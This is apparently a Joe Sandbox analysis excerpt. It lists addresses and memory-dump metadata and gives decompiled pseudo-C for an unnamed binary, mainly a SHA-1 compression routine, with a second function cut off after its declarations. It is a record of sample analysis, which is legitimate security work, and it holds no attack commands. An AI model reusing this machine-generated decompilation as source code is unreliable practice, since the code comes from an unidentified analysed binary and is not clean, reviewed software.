                                                    0x00cd7c08
                                                    0x00cd7c85
                                                    0x00cd7c85
                                                    0x00cd7c8c
                                                    0x00000000
                                                    0x00cd7c8c
                                                    0x00cd7bdc
                                                    0x00cd7b3a
                                                    0x00000000
                                                    0x00cd7b3a
                                                    0x00cd7ace
                                                    0x00cd7ad1
                                                    0x00cd7ad1
                                                    0x00cd7ad3
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7ad5
                                                    0x00cd7ad6
                                                    0x00cd7ad9
                                                    0x00cd7adb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7add
                                                    0x00cd7adf
                                                    0x00000000
                                                    0x00cd7adf
                                                    0x00cd7a2e
                                                    0x00cd7a31
                                                    0x00cd7a3b
                                                    0x00cd7a46
                                                    0x00cd7a48
                                                    0x00cd7a4c
                                                    0x00cd7a4f
                                                    0x00cd7a53
                                                    0x00cd7a57
                                                    0x00cd7a59
                                                    0x00cd7a5c
                                                    0x00000000
                                                    0x00cd7a5c
                                                    0x00cd7a88
                                                    0x00cd7a8d
                                                    0x00cd7a93
                                                    0x00cd7a9e
                                                    0x00cd7aa5
                                                    0x00cd7aa7
                                                    0x00cd7aab
                                                    0x00cd7aae
                                                    0x00cd7ab2
                                                    0x00cd7ab4
                                                    0x00000000
                                                    0x00cd7ab4
                                                    0x00cd79ff
                                                    0x00cd7a03
                                                    0x00cd7a03
                                                    0x00000000
                                                    0x00cd7a03
                                                    0x00cd79d5
                                                    0x00cd79d8
                                                    0x00cd79d8
                                                    0x00cd79d8
                                                    0x00000000
                                                    0x00cd79d8
                                                    0x00cd7960
                                                    0x00cd7963
                                                    0x00cd7963
                                                    0x00cd7965
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7967
                                                    0x00cd7968
                                                    0x00cd796b
                                                    0x00cd796e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7970
                                                    0x00000000
                                                    0x00cd7970
                                                    0x00cd7976
                                                    0x00cd7978
                                                    0x00000000
                                                    0x00cd7978
                                                    0x00cd7922
                                                    0x00cd7925
                                                    0x00cd7927
                                                    0x00cd7931
                                                    0x00cd7939
                                                    0x00cd793b
                                                    0x00cd793e
                                                    0x00cd7940
                                                    0x00cd7943
                                                    0x00cd794b
                                                    0x00000000
                                                    0x00cd794b
                                                    0x00cd78d0
                                                    0x00cd78d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd78d6
                                                    0x00cd78e1
                                                    0x00cd78e7
                                                    0x00cd783c
                                                    0x00000000
                                                    0x00cd783c
                                                    0x00cd78ed
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd78f5
                                                    0x00cd78fb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd78fb
                                                    0x00cd7874
                                                    0x00cd7835
                                                    0x00cd7835
                                                    0x00000000
                                                    0x00cd7835
                                                    0x00cd7813
                                                    0x00cd7817
                                                    0x00cd7818
                                                    0x00cd7819
                                                    0x00cd7821
                                                    0x00000000
                                                    0x00cd7823
                                                    0x00000000
                                                    0x00cd7823

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                    • Instruction ID: fef54d40e2703033dbe253ce4a96c79322c9da7c8e16fbe0704a9a3936c1a69f
                                                    • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                    • Instruction Fuzzy Hash: FE62E97160C3458FCB15CF28C8909B9BBE1BFD5304F18866EE99A8B346E730E945DB15
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 70%
                                                    			E00CCF461(signed int* _a4, signed int* _a8, signed int* _a12, char _a16) {
                                                    				signed int _v4;
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				signed int* _v20;
                                                    				signed int _v24;
                                                    				signed int _v28;
                                                    				signed int _v32;
                                                    				signed int _v36;
                                                    				signed int _v40;
                                                    				signed int _t434;
                                                    				intOrPtr _t436;
                                                    				intOrPtr _t441;
                                                    				void* _t446;
                                                    				intOrPtr _t448;
                                                    				signed int _t451;
                                                    				void* _t453;
                                                    				signed int _t459;
                                                    				signed int _t465;
                                                    				signed int _t471;
                                                    				signed int _t478;
                                                    				signed int _t481;
                                                    				signed int _t488;
                                                    				signed int _t511;
                                                    				signed int _t518;
                                                    				signed int _t525;
                                                    				signed int _t545;
                                                    				signed int _t554;
                                                    				signed int _t563;
                                                    				signed int* _t591;
                                                    				signed int _t592;
                                                    				signed int _t596;
                                                    				signed int _t599;
                                                    				signed int _t600;
                                                    				signed int* _t601;
                                                    				signed int _t602;
                                                    				signed int _t604;
                                                    				signed int _t606;
                                                    				signed int _t607;
                                                    				signed int* _t608;
                                                    				signed int _t609;
                                                    				signed int* _t675;
                                                    				signed int* _t746;
                                                    				signed int _t757;
                                                    				signed int _t774;
                                                    				signed int _t778;
                                                    				signed int _t782;
                                                    				signed int _t783;
                                                    				signed int _t787;
                                                    				signed int _t788;
                                                    				signed int _t792;
                                                    				signed int _t797;
                                                    				signed int _t801;
                                                    				signed int _t805;
                                                    				signed int _t807;
                                                    				signed int _t810;
                                                    				signed int* _t812;
                                                    				signed int _t815;
                                                    				signed int _t816;
                                                    				signed int _t817;
                                                    				signed int _t821;
                                                    				signed int _t822;
                                                    				signed int _t826;
                                                    				signed int _t831;
                                                    				signed int _t835;
                                                    				signed int _t839;
                                                    				signed int* _t840;
                                                    				signed int _t842;
                                                    				signed int _t843;
                                                    				signed int _t844;
                                                    				signed int _t846;
                                                    				signed int _t847;
                                                    				signed int _t849;
                                                    				signed int* _t850;
                                                    				signed int _t853;
                                                    				signed int _t857;
                                                    				signed int _t858;
                                                    				signed int* _t862;
                                                    				signed int _t863;
                                                    				signed int _t865;
                                                    				signed int _t866;
                                                    				signed int _t870;
                                                    				signed int _t871;
                                                    				signed int _t875;
                                                    				signed int _t879;
                                                    				signed int _t883;
                                                    				signed int _t887;
                                                    				signed int _t888;
                                                    				signed int* _t889;
                                                    				signed int _t890;
                                                    				signed int _t892;
                                                    				signed int _t893;
                                                    				signed int _t894;
                                                    				signed int _t896;
                                                    				signed int _t897;
                                                    				signed int _t899;
                                                    				signed int _t900;
                                                    				signed int _t902;
                                                    				signed int _t903;
                                                    				signed int* _t904;
                                                    				signed int _t905;
                                                    				signed int _t907;
                                                    				signed int _t908;
                                                    				signed int _t910;
                                                    				signed int _t911;
                                                    
                                                    				_t912 =  &_v40;
                                                    				if(_a16 == 0) {
                                                    					_t840 = _a8;
                                                    					_v20 = _t840;
                                                    					E00CE0320(_t840, _a12, 0x40);
                                                    					_t912 =  &(( &_v40)[3]);
                                                    				} else {
                                                    					_t840 = _a12;
                                                    					_v20 = _t840;
                                                    				}
                                                    				_t850 = _a4;
                                                    				_t592 = _t850[1];
                                                    				_t894 =  *_t850;
                                                    				_v28 = _t850[2];
                                                    				_v24 = _t850[3];
                                                    				_v32 = _t592;
                                                    				_v36 = 0;
                                                    				_t434 = E00CE68E4( *_t840);
                                                    				asm("rol edx, 0x5");
                                                    				 *_t840 = _t434;
                                                    				_t435 = _t840;
                                                    				_t596 = (_t592 & (_v24 ^ _v28) ^ _v24) + _t894 + _t434 + _t850[4] + 0x5a827999;
                                                    				_v16 = _t840;
                                                    				_t853 = _v32;
                                                    				asm("ror esi, 0x2");
                                                    				_v32 =  &(_t840[3]);
                                                    				do {
                                                    					_t436 = E00CE68E4(_t435[1]);
                                                    					asm("rol edx, 0x5");
                                                    					 *((intOrPtr*)(_v16 + 4)) = _t436;
                                                    					asm("ror ebp, 0x2");
                                                    					_v24 = _v24 + 0x5a827999 + ((_v28 ^ _t853) & _t894 ^ _v28) + _t596 + _t436;
                                                    					_t441 = E00CE68E4( *((intOrPtr*)(_v32 - 4)));
                                                    					asm("rol edx, 0x5");
                                                    					 *((intOrPtr*)(_v32 - 4)) = _t441;
                                                    					asm("ror ebx, 0x2");
                                                    					_v28 = _v28 + 0x5a827999 + ((_t853 ^ _t894) & _t596 ^ _t853) + _v24 + _t441;
                                                    					_t446 = E00CE68E4( *_v32);
                                                    					asm("rol edx, 0x5");
                                                    					 *_v32 = _t446;
                                                    					asm("ror dword [esp+0x2c], 0x2");
                                                    					_t853 = _t853 + ((_t596 ^ _t894) & _v24 ^ _t894) + _v28 + 0x5a827999 + _t446;
                                                    					_t448 = E00CE68E4( *((intOrPtr*)(_v32 + 4)));
                                                    					_v32 = _v32 + 0x14;
                                                    					asm("rol edx, 0x5");
                                                    					 *((intOrPtr*)(_v32 + 4)) = _t448;
                                                    					_t451 = _v36 + 5;
                                                    					asm("ror dword [esp+0x2c], 0x2");
                                                    					_v36 = _t451;
                                                    					_t894 = _t894 + ((_t596 ^ _v24) & _v28 ^ _t596) + _t853 + _t448 + 0x5a827999;
                                                    					_v16 =  &(_t840[_t451]);
                                                    					_t453 = E00CE68E4(_t840[_t451]);
                                                    					_t912 =  &(_t912[5]);
                                                    					asm("rol edx, 0x5");
                                                    					 *_v16 = _t453;
                                                    					_t435 = _v16;
                                                    					asm("ror esi, 0x2");
                                                    					_t596 = _t596 + 0x5a827999 + ((_v24 ^ _v28) & _t853 ^ _v24) + _t894 + _t453;
                                                    				} while (_v36 != 0xf);
                                                    				_t774 = _t840[0xe] ^ _t840[9] ^ _t840[1] ^ _t840[3];
                                                    				_v32 = _t853;
                                                    				_t857 = _t840[0xd] ^ _t840[8] ^  *_t840 ^ _t840[2];
                                                    				asm("rol ecx, 0x5");
                                                    				asm("rol esi, 1");
                                                    				asm("rol edx, 1");
                                                    				asm("ror ebp, 0x2");
                                                    				_t840[1] = _t774;
                                                    				_t459 = ((_v28 ^ _v32) & _t894 ^ _v28) + _t596 + _t857 + _v24 + 0x5a827999;
                                                    				 *_t840 = _t857;
                                                    				_v40 = _t459;
                                                    				asm("rol ecx, 0x5");
                                                    				_t778 = _t840[0xf] ^ _t840[0xa] ^ _t840[4] ^ _t840[2];
                                                    				_t465 = ((_v32 ^ _t894) & _t596 ^ _v32) + _t459 + _t774 + _v28 + 0x5a827999;
                                                    				_v36 = _t465;
                                                    				asm("ror ebx, 0x2");
                                                    				asm("rol edx, 1");
                                                    				asm("rol ecx, 0x5");
                                                    				asm("ror dword [esp+0x10], 0x2");
                                                    				_t840[2] = _t778;
                                                    				_t471 = ((_t596 ^ _t894) & _v40 ^ _t894) + _t465 + _t778 + _v32 + 0x5a827999;
                                                    				_v32 = _t471;
                                                    				asm("rol ecx, 0x5");
                                                    				_t782 = _t840[0xb] ^ _t840[5] ^ _t857 ^ _t840[3];
                                                    				_t858 = _v40;
                                                    				asm("rol edx, 1");
                                                    				_t840[3] = _t782;
                                                    				_v24 = _t596;
                                                    				asm("ror dword [esp+0x18], 0x2");
                                                    				_t783 = 0x11;
                                                    				_v28 = ((_t596 ^ _t858) & _v36 ^ _t596) + _t471 + 0x5a827999 + _t782 + _t894;
                                                    				_v16 = _t783;
                                                    				do {
                                                    					_t96 = _t783 + 5; // 0x16
                                                    					_t478 = _t96;
                                                    					_t97 = _t783 - 5; // 0xc
                                                    					_v8 = _t478;
                                                    					_t99 = _t783 + 3; // 0x14
                                                    					_t896 = _t99 & 0x0000000f;
                                                    					_v12 = _t896;
                                                    					_t599 = _t478 & 0x0000000f;
                                                    					asm("rol ecx, 0x5");
                                                    					_t787 = _t840[_t97 & 0x0000000f] ^ _t840[_t783 & 0x0000000f] ^ _t840[_t896] ^ _t840[_t599];
                                                    					_t481 = _v16;
                                                    					asm("rol edx, 1");
                                                    					_t840[_t896] = _t787;
                                                    					_t897 = _v32;
                                                    					asm("ror ebp, 0x2");
                                                    					_v32 = _t897;
                                                    					_t862 = _v20;
                                                    					_v24 = _v24 + 0x6ed9eba1 + (_t858 ^ _v36 ^ _t897) + _v28 + _t787;
                                                    					_t788 = 0xf;
                                                    					_t899 = _t481 + 0x00000004 & _t788;
                                                    					_t842 = _t481 + 0x00000006 & _t788;
                                                    					_t792 =  *(_t862 + (_t481 - 0x00000004 & _t788) * 4) ^  *(_t862 + (_t481 + 0x00000001 & _t788) * 4) ^  *(_t862 + _t899 * 4) ^  *(_t862 + _t842 * 4);
                                                    					asm("rol edx, 1");
                                                    					 *(_t862 + _t899 * 4) = _t792;
                                                    					_t863 = _v28;
                                                    					asm("rol ecx, 0x5");
                                                    					asm("ror esi, 0x2");
                                                    					_v28 = _t863;
                                                    					_t488 = _v16;
                                                    					_v40 = _v40 + 0x6ed9eba1 + (_v36 ^ _v32 ^ _t863) + _v24 + _t792;
                                                    					_t865 = _t488 + 0x00000007 & 0x0000000f;
                                                    					_t675 = _v20;
                                                    					_t797 = _v20[_t488 - 0x00000003 & 0x0000000f] ^  *(_t675 + (_t488 + 0x00000002 & 0x0000000f) * 4) ^  *(_t675 + _t865 * 4) ^  *(_t675 + _t599 * 4);
                                                    					asm("rol edx, 1");
                                                    					 *(_t675 + _t599 * 4) = _t797;
                                                    					_t600 = _v24;
                                                    					asm("rol ecx, 0x5");
                                                    					asm("ror ebx, 0x2");
                                                    					_v24 = _t600;
                                                    					_t601 = _v20;
                                                    					_v36 = _v36 + 0x6ed9eba1 + (_t600 ^ _v32 ^ _v28) + _v40 + _t797;
                                                    					asm("rol ecx, 0x5");
                                                    					_t801 =  *(_t601 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t601 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t601 + _t842 * 4) ^  *(_t601 + _v12 * 4);
                                                    					asm("rol edx, 1");
                                                    					 *(_t601 + _t842 * 4) = _t801;
                                                    					_t602 = _v24;
                                                    					_t843 = _v40;
                                                    					asm("ror edi, 0x2");
                                                    					_v40 = _t843;
                                                    					_t840 = _v20;
                                                    					_v32 = _v32 + 0x6ed9eba1 + (_t602 ^ _t843 ^ _v28) + _v36 + _t801;
                                                    					_t805 = _t840[_v16 - 0x00000007 & 0x0000000f] ^ _t840[_v16 - 0x00000001 & 0x0000000f] ^ _t840[_t865] ^ _t840[_t899];
                                                    					_t900 = _v36;
                                                    					asm("rol edx, 1");
                                                    					asm("rol ecx, 0x5");
                                                    					_t840[_t865] = _t805;
                                                    					_t858 = _v40;
                                                    					_t783 = _v8;
                                                    					asm("ror ebp, 0x2");
                                                    					_v36 = _t900;
                                                    					_v16 = _t783;
                                                    					_v28 = _v28 + 0x6ed9eba1 + (_t602 ^ _t858 ^ _t900) + _v32 + _t805;
                                                    				} while (_t783 + 3 <= 0x23);
                                                    				_t866 = 0x25;
                                                    				_v16 = _t866;
                                                    				while(1) {
                                                    					_t205 = _t866 + 5; // 0x2a
                                                    					_t511 = _t205;
                                                    					_t206 = _t866 - 5; // 0x20
                                                    					_v4 = _t511;
                                                    					_t208 = _t866 + 3; // 0x28
                                                    					_t807 = _t208 & 0x0000000f;
                                                    					_v8 = _t807;
                                                    					_t902 = _t511 & 0x0000000f;
                                                    					_t870 = _t840[_t206 & 0x0000000f] ^ _t840[_t866 & 0x0000000f] ^ _t840[_t902] ^ _t840[_t807];
                                                    					asm("rol esi, 1");
                                                    					_t840[_t807] = _t870;
                                                    					asm("ror dword [esp+0x1c], 0x2");
                                                    					asm("rol edx, 0x5");
                                                    					_t871 = 0xf;
                                                    					_v24 = _v28 - 0x70e44324 + ((_v36 | _v32) & _v40 | _v36 & _v32) + _t870 + _t602;
                                                    					_t518 = _v16;
                                                    					_t604 = _t518 + 0x00000006 & _t871;
                                                    					_t810 = _t518 + 0x00000004 & _t871;
                                                    					_v12 = _t810;
                                                    					_t875 = _t840[_t518 - 0x00000004 & _t871] ^ _t840[_t518 + 0x00000001 & _t871] ^ _t840[_t810] ^ _t840[_t604];
                                                    					asm("rol esi, 1");
                                                    					_t840[_t810] = _t875;
                                                    					_t844 = _v28;
                                                    					asm("rol edx, 0x5");
                                                    					asm("ror edi, 0x2");
                                                    					_v28 = _t844;
                                                    					_t812 = _v20;
                                                    					_v40 = _v24 - 0x70e44324 + ((_v32 | _t844) & _v36 | _v32 & _t844) + _t875 + _v40;
                                                    					_t525 = _v16;
                                                    					_t846 = _t525 + 0x00000007 & 0x0000000f;
                                                    					_t879 =  *(_t812 + (_t525 - 0x00000003 & 0x0000000f) * 4) ^  *(_t812 + (_t525 + 0x00000002 & 0x0000000f) * 4) ^  *(_t812 + _t846 * 4) ^  *(_t812 + _t902 * 4);
                                                    					asm("rol esi, 1");
                                                    					 *(_t812 + _t902 * 4) = _t879;
                                                    					asm("rol edx, 0x5");
                                                    					_t903 = _v24;
                                                    					asm("ror ebp, 0x2");
                                                    					_t815 = _v40 + 0x8f1bbcdc + ((_t903 | _v28) & _v32 | _t903 & _v28) + _t879 + _v36;
                                                    					_v24 = _t903;
                                                    					_t904 = _v20;
                                                    					_v36 = _t815;
                                                    					asm("rol edx, 0x5");
                                                    					_t883 =  *(_t904 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t904 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t904 + _v8 * 4) ^  *(_t904 + _t604 * 4);
                                                    					asm("rol esi, 1");
                                                    					 *(_t904 + _t604 * 4) = _t883;
                                                    					_t602 = _v24;
                                                    					asm("ror dword [esp+0x10], 0x2");
                                                    					_t816 = _t815 + ((_t602 | _v40) & _v28 | _t602 & _v40) + 0x8f1bbcdc + _t883 + _v32;
                                                    					_v32 = _t816;
                                                    					asm("rol edx, 0x5");
                                                    					_t887 =  *(_t904 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t904 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t904 + _v12 * 4) ^  *(_t904 + _t846 * 4);
                                                    					asm("rol esi, 1");
                                                    					 *(_t904 + _t846 * 4) = _t887;
                                                    					_t905 = _v36;
                                                    					asm("ror ebp, 0x2");
                                                    					_v36 = _t905;
                                                    					_t309 = _t816 - 0x70e44324; // -4294967294
                                                    					_t866 = _v4;
                                                    					_v28 = _t309 + ((_v40 | _t905) & _t602 | _v40 & _t905) + _t887 + _v28;
                                                    					_v16 = _t866;
                                                    					if(_t866 + 3 > 0x37) {
                                                    						break;
                                                    					}
                                                    					_t840 = _v20;
                                                    				}
                                                    				_t817 = 0x39;
                                                    				_v16 = _t817;
                                                    				_t847 = _t602;
                                                    				do {
                                                    					_t315 = _t817 + 5; // 0x3e
                                                    					_t545 = _t315;
                                                    					_v8 = _t545;
                                                    					_t317 = _t817 + 3; // 0x3c
                                                    					_t318 = _t817 - 5; // 0x34
                                                    					_t888 = 0xf;
                                                    					_t907 = _t317 & _t888;
                                                    					_t606 = _t545 & _t888;
                                                    					_t889 = _v20;
                                                    					_v4 = _t907;
                                                    					_t821 =  *(_t889 + (_t318 & _t888) * 4) ^  *(_t889 + (_t817 & _t888) * 4) ^  *(_t889 + _t907 * 4) ^  *(_t889 + _t606 * 4);
                                                    					asm("rol edx, 1");
                                                    					 *(_t889 + _t907 * 4) = _t821;
                                                    					_t908 = _v32;
                                                    					asm("rol ecx, 0x5");
                                                    					asm("ror ebp, 0x2");
                                                    					_v32 = _t908;
                                                    					_v24 = (_v40 ^ _v36 ^ _t908) + _t821 + _t847 + _v28 + 0xca62c1d6;
                                                    					_t554 = _v16;
                                                    					_t822 = 0xf;
                                                    					_t849 = _t554 + 0x00000006 & _t822;
                                                    					_t910 = _t554 + 0x00000004 & _t822;
                                                    					_t826 =  *(_t889 + (_t554 - 0x00000004 & _t822) * 4) ^  *(_t889 + (_t554 + 0x00000001 & _t822) * 4) ^  *(_t889 + _t910 * 4) ^  *(_t889 + _t849 * 4);
                                                    					asm("rol edx, 1");
                                                    					 *(_t889 + _t910 * 4) = _t826;
                                                    					_t890 = _v28;
                                                    					asm("rol ecx, 0x5");
                                                    					_v40 = (_v36 ^ _v32 ^ _t890) + _t826 + _v40 + _v24 + 0xca62c1d6;
                                                    					_t563 = _v16;
                                                    					asm("ror esi, 0x2");
                                                    					_v28 = _t890;
                                                    					_t892 = _t563 + 0x00000007 & 0x0000000f;
                                                    					_t746 = _v20;
                                                    					_t831 = _v20[_t563 - 0x00000003 & 0x0000000f] ^  *(_t746 + (_t563 + 0x00000002 & 0x0000000f) * 4) ^  *(_t746 + _t892 * 4) ^  *(_t746 + _t606 * 4);
                                                    					asm("rol edx, 1");
                                                    					 *(_t746 + _t606 * 4) = _t831;
                                                    					_t607 = _v24;
                                                    					asm("rol ecx, 0x5");
                                                    					asm("ror ebx, 0x2");
                                                    					_v24 = _t607;
                                                    					_t608 = _v20;
                                                    					_v36 = (_t607 ^ _v32 ^ _v28) + _t831 + _v36 + _v40 + 0xca62c1d6;
                                                    					asm("rol ecx, 0x5");
                                                    					_t835 = _t608[_v16 - 0x00000008 & 0x0000000f] ^ _t608[_v16 + 0xfffffffe & 0x0000000f] ^ _t608[_v4] ^ _t608[_t849];
                                                    					asm("rol edx, 1");
                                                    					_t608[_t849] = _t835;
                                                    					_t847 = _v24;
                                                    					asm("ror dword [esp+0x10], 0x2");
                                                    					_v32 = (_t847 ^ _v40 ^ _v28) + _t835 + _v32 + _v36 + 0xca62c1d6;
                                                    					_t839 = _t608[_v16 - 0x00000007 & 0x0000000f] ^ _t608[_v16 - 0x00000001 & 0x0000000f] ^ _t608[_t892] ^ _t608[_t910];
                                                    					_t911 = _v36;
                                                    					asm("rol edx, 1");
                                                    					_t608[_t892] = _t839;
                                                    					_t609 = _v40;
                                                    					_t893 = _v32;
                                                    					asm("ror ebp, 0x2");
                                                    					_t817 = _v8;
                                                    					asm("rol ecx, 0x5");
                                                    					_v36 = _t911;
                                                    					_t757 = _t893 + 0xca62c1d6 + (_t847 ^ _t609 ^ _t911) + _t839 + _v28;
                                                    					_v16 = _t817;
                                                    					_v28 = _t757;
                                                    				} while (_t817 + 3 <= 0x4b);
                                                    				_t591 = _a4;
                                                    				_t591[1] = _t591[1] + _t893;
                                                    				_t591[2] = _t591[2] + _t911;
                                                    				_t591[3] = _t591[3] + _t609;
                                                    				 *_t591 =  *_t591 + _t757;
                                                    				_t591[4] = _t591[4] + _t847;
                                                    				return _t591;
                                                    			}
                                                    0x00ccf94a
                                                    0x00ccf94f
                                                    0x00ccf952
                                                    0x00ccf95b
                                                    0x00ccf95f
                                                    0x00ccf966
                                                    0x00ccf96b
                                                    0x00ccf972
                                                    0x00ccf982
                                                    0x00ccf98b
                                                    0x00ccf98d
                                                    0x00ccf990
                                                    0x00ccf9a4
                                                    0x00ccf9ab
                                                    0x00ccf9ae
                                                    0x00ccf9b8
                                                    0x00ccf9be
                                                    0x00ccf9c2
                                                    0x00ccf9d2
                                                    0x00ccf9e1
                                                    0x00ccf9e4
                                                    0x00ccf9e6
                                                    0x00ccf9ed
                                                    0x00ccf9f0
                                                    0x00ccfa0c
                                                    0x00ccfa19
                                                    0x00ccfa1b
                                                    0x00ccfa1f
                                                    0x00ccfa26
                                                    0x00ccfa2d
                                                    0x00ccfa46
                                                    0x00ccfa4a
                                                    0x00ccfa4c
                                                    0x00ccfa50
                                                    0x00ccfa64
                                                    0x00ccfa7b
                                                    0x00ccfa80
                                                    0x00ccfa87
                                                    0x00ccfa9e
                                                    0x00ccfaa8
                                                    0x00ccfaaa
                                                    0x00ccfaae
                                                    0x00ccfaba
                                                    0x00ccfabf
                                                    0x00ccfac7
                                                    0x00ccfacd
                                                    0x00ccfad3
                                                    0x00ccfad7
                                                    0x00ccfae1
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccf8f6
                                                    0x00ccf8f6
                                                    0x00ccfae9
                                                    0x00ccfaea
                                                    0x00ccfaee
                                                    0x00ccfaf0
                                                    0x00ccfaf0
                                                    0x00ccfaf0
                                                    0x00ccfaf5
                                                    0x00ccfaf9
                                                    0x00ccfafe
                                                    0x00ccfb03
                                                    0x00ccfb08
                                                    0x00ccfb0a
                                                    0x00ccfb0c
                                                    0x00ccfb10
                                                    0x00ccfb1f
                                                    0x00ccfb2e
                                                    0x00ccfb30
                                                    0x00ccfb33
                                                    0x00ccfb3b
                                                    0x00ccfb40
                                                    0x00ccfb49
                                                    0x00ccfb4f
                                                    0x00ccfb53
                                                    0x00ccfb57
                                                    0x00ccfb5e
                                                    0x00ccfb60
                                                    0x00ccfb73
                                                    0x00ccfb82
                                                    0x00ccfb84
                                                    0x00ccfb87
                                                    0x00ccfb8f
                                                    0x00ccfba2
                                                    0x00ccfba6
                                                    0x00ccfbaa
                                                    0x00ccfbad
                                                    0x00ccfbbd
                                                    0x00ccfbc6
                                                    0x00ccfbd0
                                                    0x00ccfbd3
                                                    0x00ccfbd5
                                                    0x00ccfbdc
                                                    0x00ccfbe0
                                                    0x00ccfbf5
                                                    0x00ccfbfe
                                                    0x00ccfc02
                                                    0x00ccfc06
                                                    0x00ccfc28
                                                    0x00ccfc34
                                                    0x00ccfc37
                                                    0x00ccfc39
                                                    0x00ccfc3c
                                                    0x00ccfc4a
                                                    0x00ccfc57
                                                    0x00ccfc74
                                                    0x00ccfc77
                                                    0x00ccfc7b
                                                    0x00ccfc7d
                                                    0x00ccfc80
                                                    0x00ccfc86
                                                    0x00ccfc8e
                                                    0x00ccfc97
                                                    0x00ccfc9b
                                                    0x00ccfca4
                                                    0x00ccfca8
                                                    0x00ccfcaa
                                                    0x00ccfcb1
                                                    0x00ccfcb5
                                                    0x00ccfcbe
                                                    0x00ccfcc2
                                                    0x00ccfcc5
                                                    0x00ccfcc8
                                                    0x00ccfccb
                                                    0x00ccfccd
                                                    0x00ccfcd7

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                    • Instruction ID: 1d44ef139e8366c4eb9a77c592fcb3a50a9ddd27c72590be74b13c9e2213ba5a
                                                    • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                    • Instruction Fuzzy Hash: 9F524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 88%
                                                    			E00CD7153(signed int __ecx) {
                                                    				void* __ebp;
                                                    				void* _t220;
                                                    				signed int* _t223;
                                                    				signed int _t225;
                                                    				signed int _t227;
                                                    				signed int _t228;
                                                    				signed int _t229;
                                                    				signed int _t233;
                                                    				signed int _t234;
                                                    				signed short _t235;
                                                    				signed int _t237;
                                                    				signed int _t239;
                                                    				signed int _t240;
                                                    				signed int _t241;
                                                    				signed int _t243;
                                                    				signed int _t244;
                                                    				signed int _t245;
                                                    				signed int _t246;
                                                    				unsigned int _t250;
                                                    				signed int _t260;
                                                    				signed int _t264;
                                                    				signed int _t269;
                                                    				signed int _t270;
                                                    				signed int _t271;
                                                    				signed int _t274;
                                                    				signed int _t275;
                                                    				signed short _t276;
                                                    				signed int _t277;
                                                    				signed int _t281;
                                                    				signed int _t282;
                                                    				unsigned int _t283;
                                                    				signed int _t287;
                                                    				signed int _t288;
                                                    				signed int _t289;
                                                    				signed int _t291;
                                                    				signed int _t292;
                                                    				signed short _t293;
                                                    				unsigned int _t298;
                                                    				signed int _t303;
                                                    				unsigned int _t305;
                                                    				signed int _t310;
                                                    				signed short _t311;
                                                    				signed int _t316;
                                                    				intOrPtr* _t321;
                                                    				signed int* _t322;
                                                    				unsigned int _t324;
                                                    				signed int _t325;
                                                    				signed int _t326;
                                                    				signed int _t329;
                                                    				signed int _t331;
                                                    				signed int _t332;
                                                    				signed int _t333;
                                                    				signed int _t334;
                                                    				signed int _t340;
                                                    				signed int _t342;
                                                    				intOrPtr _t344;
                                                    				signed int _t345;
                                                    				signed int _t346;
                                                    				signed int _t348;
                                                    				void* _t349;
                                                    				signed int _t352;
                                                    				signed int _t353;
                                                    				unsigned int _t356;
                                                    				signed int _t357;
